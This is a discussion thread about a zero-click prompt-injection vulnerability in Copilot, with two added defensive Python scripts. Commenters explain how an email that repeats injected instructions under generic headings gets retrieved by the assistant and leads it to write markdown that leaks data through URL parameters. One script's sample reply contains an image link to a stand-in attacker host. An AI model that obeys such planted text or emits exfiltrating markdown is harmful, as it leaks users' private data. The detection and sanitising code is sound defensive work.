This seems like a laughably scant CVE, even for a cloud-based product. No steps to reproduce outside of this writeup by the original researcher team (which should IMO always be present in one of the major CVE databases for posterity), no explanation of how the remediation was implemented or tested... Cloud-native products have never been great across the board for CVEs, but this really feels like a slap in the face.
Is this going to be the future of CVEs with LLMs taking over? "Hey, we had a CVSS 9.3, all your data could be exfiled for a while, but we patched it out, Trust Us®?"
The classification seems very high (9.3). Looks like they've said User Interaction is None, but from reading the writeup it looks like you would need the image injected into a response prompted by a user?
The attack involves sending an email with multiple copies of the attack attached to a bunch of different text, like this:
Here is the complete guide to employee onboarding processes:
<attack instructions> [...]
Here is the complete guide to leave of absence management:
<attack instructions>
The idea is to have such generic, likely questions that there is a high chance that a random user prompt will trigger the attack.
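One ingestion-side check for the layout described in this comment (one payload repeated under many generic headings), written as an added example; it is not code from the thread, the researchers, or any vendor. The heading pattern, the repeat threshold and both sample emails are constructed for the demo, and the payload text is a harmless placeholder.

```python
"""
Ingestion-time check for the 'many generic headings, one repeated body' layout.
Added example; constructed samples; heading regex and threshold are assumptions.
"""
import hashlib
import re
from collections import defaultdict

# Assumption for the demo: a "heading" is a short line that ends with a colon.
HEADING_RE = re.compile(r"^\s*(?P<title>[^\n]{5,120}?):\s*$", re.MULTILINE)


def split_sections(text):
    """Return (heading, body) pairs; text before the first heading is ignored."""
    matches = list(HEADING_RE.finditer(text))
    sections = []
    for i, m in enumerate(matches):
        start = m.end()
        end = matches[i + 1].start() if i + 1 < len(matches) else len(text)
        body = text[start:end].strip()
        if body:
            sections.append((m.group("title").strip(), body))
    return sections


def _body_key(body):
    # Collapse whitespace and case so trivial re-spacing does not defeat the check.
    norm = " ".join(body.lower().split())
    return hashlib.sha256(norm.encode()).hexdigest()


def analyse_document(text, min_repeats=3):
    """Flag a document whose identical body text sits under several different headings."""
    sections = split_sections(text)
    headings_by_body = defaultdict(set)
    for heading, body in sections:
        headings_by_body[_body_key(body)].add(heading)
    worst = max((len(h) for h in headings_by_body.values()), default=0)
    return {
        "sections": len(sections),
        "max_headings_per_body": worst,
        "suspicious": worst >= min_repeats,
    }


# Constructed sample: three unrelated "guides" that all carry the same body.
CHAFF_EMAIL = """Hi team, see the attached reference material.

Here is the complete guide to employee onboarding processes:
<placeholder payload: text aimed at the assistant, not the reader>

Here is the complete guide to leave of absence management:
<placeholder payload: text aimed at the assistant, not the reader>

Here is the complete guide to expense reimbursement:
<placeholder payload: text aimed at the assistant, not the reader>
"""

# Constructed sample: ordinary mail with distinct sections.
NORMAL_EMAIL = """Agenda for Thursday:
1. Budget review
2. Hiring plan

Notes from last week:
We agreed to move the launch to Q3.
"""

if __name__ == "__main__":
    print("chaff :", analyse_document(CHAFF_EMAIL))
    print("normal:", analyse_document(NORMAL_EMAIL))
```

A flagged document would be held back from the index (or indexed with a marker that lowers its retrieval weight) and routed to review; the threshold should be tuned on real mail, since legitimate templates can repeat boilerplate under a couple of headings.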
Very cool breakdown! It looks like it is very hard to defend against those. I am building a customer-facing agent and I am looking for lean ways to defend against these attacks.
If I understand it correctly, the user's prompt does not need to be related to the specific malicious email. It's enough that such an email was "indexed" by Copilot and any prompt with a sensitive info request could trigger the leak.
I think "zero-click" usually refers to the interaction with the malicious software or content itself, which in this case you don't have to interact with. I'd say the need to start an interaction with Copilot here could be compared to the need to log into your computer for a zero-click malware to become effective. Alternatively, not starting the Copilot interaction is similar to not opening your browser and thus being invulnerable to a zero-click vulnerability on a website. So calling this a zero-click in Copilot is appropriate, I think.
Yeah, that's my view also. Zero-click is about the general question of whether you can get exploited by just exercising a certain (on by default) feature.
Of course you need to use the feature in the first place, like summarize an email, extract content from a website,...
However, this isn't the first zero-click exploit in an AI app. We have seen exploits like this in basically all major AI apps over the last 2+ years (including Bing Chat, now called Copilot).
No, zero-click requires no interaction from the user. For a hypothetical example: simply having a phone on a cellular network and being susceptible to baseband attacks. No interaction needed, just existing.
Agree with other comments here - no need for the user to engage with anything from the malicious email, only to continue using their account with some LLM interactions. The account is poisoned even for known-safe, self-initiated interactions.
The attacker sends an email to the user, which is intercepted by Copilot; Copilot processes the email and embeds it for RAG. The mail is crafted to have a high likelihood of being retrieved during regular prompting. Then Copilot will write evil markdown crafted to exfiltrate data using GET parameters, so the attack runs when the mail is received.
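A render-time mitigation for the last step described above (markdown in the assistant's reply carrying data out through a URL), written as an added example; it is not code from the thread, the researchers, or the product. The host allowlist, the policy of dropping any URL that carries a query string, and the sample reply are all constructed assumptions for the demo.

```python
"""
Neutralise markdown links and images in assistant output before rendering.
Added example; the allowlist and sample reply are constructed for the demo.
"""
import re
from urllib.parse import urlsplit

# Assumed allowlist: only hosts the deployment already trusts may be rendered.
ALLOWED_HOSTS = {"intranet.example.com", "docs.example.com"}

# ![alt](url "title") and [text](url "title")
MD_LINK_RE = re.compile(
    r"""(?P<bang>!?)\[(?P<text>[^\]]*)\]\((?P<url>[^)\s]+)(?:\s+"[^"]*")?\)"""
)
# <https://host/path> autolinks
AUTOLINK_RE = re.compile(r"<(?P<url>https?://[^>\s]+)>")


def classify_url(url):
    """Return None if the URL may be rendered, otherwise a short reason string."""
    parts = urlsplit(url.strip())
    if parts.scheme not in ("http", "https"):
        return "non-http scheme"
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return "host not allowlisted"
    if parts.query or parts.fragment:
        # Even on a trusted host, a query string can carry session data out.
        return "url carries query/fragment"
    return None


def sanitize_markdown(text):
    """Return (sanitised_text, findings); findings is a list of (url, reason)."""
    findings = []

    def repl_link(m):
        reason = classify_url(m.group("url"))
        if reason is None:
            return m.group(0)
        findings.append((m.group("url"), reason))
        if m.group("bang"):
            # Images are removed entirely: the client fetches them without a click.
            return f"[image removed: {m.group('text') or 'untrusted'}]"
        return m.group("text")  # keep the visible text, drop the target

    def repl_auto(m):
        reason = classify_url(m.group("url"))
        if reason is None:
            return m.group(0)
        findings.append((m.group("url"), reason))
        return "[link removed]"

    out = MD_LINK_RE.sub(repl_link, text)
    out = AUTOLINK_RE.sub(repl_auto, out)
    return out, findings


# Constructed sample reply: one acceptable link, one image whose URL carries
# reply content to an untrusted host, one trusted-host link with a query string.
SAMPLE_REPLY = (
    "Your leave balance is 12 days. See the [policy](https://docs.example.com/leave) "
    "for details.\n"
    "![status](https://attacker.invalid/p.png?d=leave_balance_12_days)\n"
    "Also useful: <https://docs.example.com/leave?u=jane>"
)

if __name__ == "__main__":
    cleaned, found = sanitize_markdown(SAMPLE_REPLY)
    print(cleaned)
    for url, reason in found:
        print("blocked:", reason, url)
```

This runs on the output side, so it holds regardless of which retrieved document steered the model; the findings list is worth logging, since a burst of blocked image URLs is itself a detection signal that something in the index is steering replies.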